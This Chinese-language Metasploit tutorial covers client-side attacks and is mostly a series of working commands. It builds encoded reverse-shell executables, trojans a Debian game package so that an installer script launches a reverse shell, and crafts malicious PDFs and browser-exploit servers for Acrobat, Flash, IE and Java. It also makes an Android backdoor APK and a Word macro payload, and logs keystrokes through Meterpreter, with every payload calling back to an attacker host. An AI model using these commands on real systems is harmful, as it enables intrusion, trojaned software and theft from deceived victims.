Mestasploit 客户端渗透

1. 简介

• 在无法突破网络边界的情况下转而攻击客户端

  • 社会工程学攻击
  • 进而渗透线上业务网络

• 含有漏洞利用代码的 web 站点

  • 利用客户端漏洞

• 含有漏洞利用代码的 doc、pdf等文档

• 诱骗被害者执行 payload

2. 攻击 windows

• 诱骗被害者执行 payload （windows）

  • msfvenom –payload-options -p windows/shell/reverse_tcp

  • msfvenom -a x86 –platform windows -p windows/shell/reverse_tcp LHOST=10.10.10.131 LPORT=4444 -b “\x00” -e x86/shikata_ga_nai -f exe -o 1.exe

    root@kali:~# msfvenom --payload-options -p windows/shell/reverse_tcp
    root@kali:~# msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.10.10.147 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o 1.exe
    # 将文件拷贝到 winxp 主机
    

• msfconsole

  • use exploit/multi/handler
  • set payload windows/shell/reverse_tcp
  • set LHOST 10.10.10.131
  • set LPORT 4444
  • exploit

  • 客户端执行文件

    msf exploit(multi/handler) > set payload windows/shell/reverse_tcp
    msf exploit(multi/handler) > set LHOST 10.10.10.131
    msf exploit(multi/handler) > set LPORT 4444
    msf exploit(multi/handler) > exploit
    

    

3. 攻击 linux

• 诱骗被害者执行 payload （linux deb 安装包）

root@kali:~# apt-get --download-only install freesweep
root@kali:~# cd /var/cache/apt/archives/
root@kali:~# cp freesweep_0.90-3+b1_amd64.deb ~
root@kali:~# cd 
root@kali:~# dpkg -x freesweep_0.90-3+b1_amd64.deb free
root@kali:~# cd free
root@kali:~/free# mkdir DEBIAN/
root@kali:~/free# cd DEBIAN/

root@kali:~/free/DEBIAN# vim control 
Package: freesweep
Version: 0.90-3
Section: Games and Amusement
Priority: optional
Architecture:amd64
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@ lists.ubuntu.com)
Description: a text-based minesweeper
    Freesweep isan implementation of the popular minesweeper game,whereone tries to find all the mines without igniting any, based on hints givenby the computer.Unlike most implementations of this game,Freesweepworksinanyvisualtextdispl in Linuxconsole,inanxterm,and inmost text-based terminals currently in use.

root@kali:~/free/DEBIAN# vim postinst
    #!/bin/sh
    sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &
root@kali:~/free# chmod 755 postinst 

# 生成 payload
root@kali:~/free/DEBIANn# msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=10.10.10.131 LPORT=4444 -b "\x00" -f elf -o /root/free/usr/games/freesweep_scores

root@kali:~/free/DEBIAN# dpkg-deb --build /root/free

# 受害者机器安装此软件
root@lamp:/home/kevin/Desktop# dpkg -i free.deb 

4. 利用 Acrobat Reader 漏洞执行 payload

• 构造 pdf 文件：use exploit/windows/fileformat/adobe_utilprintf

  # 构造 pdf 文件
  use exploit/windows/fileformat/adobe_utilprintf
  set payload windows/meterpreter/reverse_tcp
  msf exploit(windows/fileformat/adobe_utilprintf) > run
      [+] msf.pdf stored at /root/.msf4/local/msf.pdf
  
  # 开启监听
  use exploit/multi/handler
  set payload windows/meterpreter/reverse_tcp
  set LHOST 10.10.10.131
  exploit 
  

• 构造恶意网站：use exploit/windows/browser/adobe_utilprintf

  use exploit/windows/browser/adobe_utilprintf
  set SRVPORT 80
  set URIPATH /
  set payload windows/meterpreter/reverse_tcp
  set LHOST 10.10.10.131
  exploit
  

• Meterpreter

  • use priv
  • run post/windows/capture/keylog_recorder

5. 利用 flash 插件漏洞执行 paylaod

• use exploit/multi/browser/adobe_flash_hacking_team_uaf

  use exploit/multi/browser/adobe_flash_hacking_team_uaf
  set SRVPORT 80
  set URIPATH /
  set payload windows/meterpreter/reverse_tcp
  set LHOST 10.10.10.131
  exploit
  

• use exploit/multi/browser/adobe_flash_opaque_background_uaf

  use exploit/multi/browser/adobe_flash_opaque_background_uaf
  set SRVPORT 80
  set URIPATH /
  set payload windows/meterpreter/reverse_tcp
  set LHOST 10.10.10.131
  exploit
  

• use auxiliary/server/browser_autopwn2

  use auxiliary/server/browser_autopwn2
  set SRVPORT 80
  set URIPATH /
  exploit
  

6. 利用 IE 浏览器漏洞执行 payload

• use exploit/windows/browser/ms14_064_ole_code_execution

  use exploit/windows/browser/ms14_064_ole_code_execution
  set SRVPORT 80
  set URIPATH /
  set payload windows/meterpreter/reverse_tcp
  set LHOST 10.10.10.131
  exploit
  

7. 利用 JRE 漏洞执行 payload

• use exploit/multi/browser/java_jre17_driver_manager

  use exploit/multi/browser/java_jre17_driver_manager
  set SRVPORT 80
  set SRVHOST 10.10.10.131
  set URIPATH /
  set payload java/meterpreter/reverse_tcp
  set LHOST 10.10.10.131
  exploit
  

• use exploit/multi/browser/java_jre17_jmxbean

  use exploit/multi/browser/java_jre17_jmxbean
  set SRVPORT 80
  set SRVHOST 10.10.10.131
  set URIPATH /
  set payload java/meterpreter/reverse_tcp
  set LHOST 10.10.10.131
  exploit
  

• use exploit/multi/browser/java_jre17_reflection_types

  use exploit/multi/browser/java_jre17_reflection_types
  set SRVPORT 80
  set SRVHOST 10.10.10.131
  set URIPATH /
  set payload java/meterpreter/reverse_tcp
  set LHOST 10.10.10.131
  exploit
  

8. 生成 android 后门程序

• use payload/android/meterpreter/reverse_tcp
• generate -f a.apk -p android -t raw

9. 宏感染

• 利用宏感染 word、except 文档
• 绕过某些基于文件类型检查的安全机制

• 生成 vbscript 脚本：msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.10.131 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe

• office 2007 +

• payload 第一部分粘入 VBA 代码

• payload 第二部分粘入 word 正文

• msf 启动侦听

  • use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp